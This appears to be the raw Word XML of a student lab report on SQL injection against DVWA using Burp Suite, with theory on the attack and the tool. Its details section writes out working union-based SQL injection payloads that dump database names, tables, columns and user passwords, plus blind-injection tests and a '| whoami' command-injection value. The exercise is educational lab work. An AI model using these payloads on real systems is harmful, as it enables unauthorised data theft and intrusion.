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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="9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4065"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="1650"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2325"/>
            <w:gridCol w:w="4065"/>
            <w:gridCol w:w="1890"/>
            <w:gridCol w:w="1650"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="805" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>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Name:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:drawing>
                <wp:anchor allowOverlap="1" behindDoc="0" distB="36576" distT="36576" distL="36576" distR="36576" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-831211</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-1369690</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="300355" cy="11071860"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="151904025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00355" cy="11071860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:drawing>
                <wp:anchor allowOverlap="1" behindDoc="0" distB="36576" distT="36576" distL="36576" distR="36576" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-528317</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>215265</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="102870" cy="9239250"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="151904024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02870" cy="9239250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>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Information Security (116U01L602)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="cle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Semester:</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>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Performance:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.30j0zll" w:id="0"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20/2/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clea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DIV/ Batch No:</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- 3</w:t>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Romil Lodaya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto"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No:</w:t>
            </w:r>
          </w:p>
        </w:tc>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16010122096</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:hanging="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="87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81"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8781"/>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F">
            <w:pPr>
              <w:spacing w:after="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Title:Analysis of sample vulnerable web applications for Man-in-Middle Attack /</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
            <w:pPr>
              <w:spacing w:after="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injection etc. using Burp Suite.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:ind w:hanging="2"/>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="9782.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3">
            <w:pPr>
              <w:shd w:fill="ffffff" w:val="clear"/>
              <w:spacing w:after="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tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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and analyze web attacks (e.g., SQL Injection, XSS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="9782.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6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="26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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing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CO3 :Identify and analyze web attacks</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="9782.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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="264"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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OWASP Testing Guide</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Burp Suite Documentation</w:t>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DVWA (Damn Vulnerable Web Application)</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="9782.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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="26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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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Basics of SQL and web application security.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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Familiarity with HTTP requests and responses.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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understanding of Burp Suite functionality.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="9782.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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="26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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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 attack methods and how to exploit them using tools like Burp Suite.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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Techniques to mitigate SQL Injection vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="9782.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0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="264"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tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="2094" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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of DVWA (Damn Vulnerable Web Application) is to give security</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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professionals a safe and lawful platform to test their abilities and resources for identifying</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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exploiting web application vulnerabilities. The DVWA also seeks to assist teachers and</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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in learning and teaching web application security in a classroom setting, as well as</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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aid web developers in better understanding the procedures involved in protecting web</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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crucial to remember that the DVWA application shouldn't be employed maliciously.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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application's developers have taken steps to prevent users from installing DVWA on</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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web servers and have defined the app's intended uses in detail. To ensure the application</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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used safely and legally, users must heed the instructions and cautions given by the</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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DVWA developers have taken steps to assure the application's safety, they</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">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disclaim liability for any abuse or malicious behaviours committed while using the</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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Users are fully accountable for their choices and any negative effects that can</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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arise from the setup and use of DVWA on their web servers.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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DVWA serves as a valuable tool for security professionals, web developers,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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educators to learn and teach about web application security. However, it is imperative</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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users utilize the application responsibly and follow the guidelines provided by its</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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creators to ensure the safe and legal use of the application.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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5">
      <w:pPr>
        <w:ind w:hanging="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="9782.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46">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="264"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Theory:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1875" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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Injection</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: An attack where malicious SQL queries are injected into input fields, allowing unauthorized access to databases.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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Burp Suite</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: A web vulnerability scanner and proxy tool used to analyze and intercept HTTP requests, facilitating security testing.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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 is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.SQL injection attacks can have a significant negative impact on an organization.Organizations have access to sensitive company data and private customer information,and SQL injection attacks often target that confidential information. When a malicious</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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successfully completes an SQL injection attack, it can have any of the following impacts:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks exposing sensitive company data stored on the SQL server.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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Compromise Users’ Privacy: Depending on the data stored on the SQL server, an attack can expose private user data, such as credit card numbers.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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Give an attacker administrative access to your system: If a database user has administrative privileges, an attacker can gain access to the system using malicious code. To protect against this kind of vulnerability, create a database user with the least possible privileges.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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Give an Attacker General Access to Your System: If you use weak SQL commands to check user names and passwords, an attacker could gain access to your system without knowing a user’s credentials. With general access to your system, an attacker can cause additional damage accessing and manipulating sensitive information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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Compromise the Integrity of Your Data: Using SQL injection, attackers can make</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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to or delete information from your system.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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Burp Suite is an integrated platform/graphical tool for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. Burp Suite is installed by default in Kali Linux.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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tool is written in Java and developed by PortSwigger Web Security. The tool has three editions: a Community Edition that can be downloaded free of charge, a Professional Edition and an Enterprise Edition that can be purchased after a trial period. The Community edition has significantly reduced functionality. It intends to provide a comprehensive solution for web application security checks. In addition to basic functionality, such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10"/>
        <w:tblW w:w="9735.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="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35"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9735"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="264"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Details:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="6939" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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96389"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904025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79638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160" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="e0e0e0" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="e0e0e0" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">| whoami</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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151904025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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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151904025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5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151904026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151904026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w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Task 1 - DVWA SQL Injection Page</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Retrieving hidden data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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id=1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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151904026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 id = 2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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151904026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id=3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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151904026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2184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id=3’ - shows error</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="5943600" cy="1676400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904026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1676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8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Retrieving data from other tables </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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5)id=3' and 1=0 union select null, version() #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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08200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904026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6)id=3' and 1=0 union select null, user() #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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151904026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id=3' and 1=0 union select null, database() #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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81200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904026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8)id=3' and 1=0 union select null,table_name from information_schema.tables where table_schema!='mysql' and table_schema!='information_schema' #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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41600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1519040269"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Passing malicious query:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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id=3' and 1=0 union select null,column_name from information_schema.columns where table_name='users' #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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51904027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id=3' and 1=0 union select null,concat(first_name,0x0a,password) from users #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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00400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904027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 blind</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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9325" cy="5359400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1519040272"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6029325"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1</w:t>
            </w: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1519040273"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 1’ and 1=1#</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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9325" cy="3987800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904027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6029325"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 1’ and 1=0#</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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9325" cy="3437570"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1519040248" name="image4.png"/>
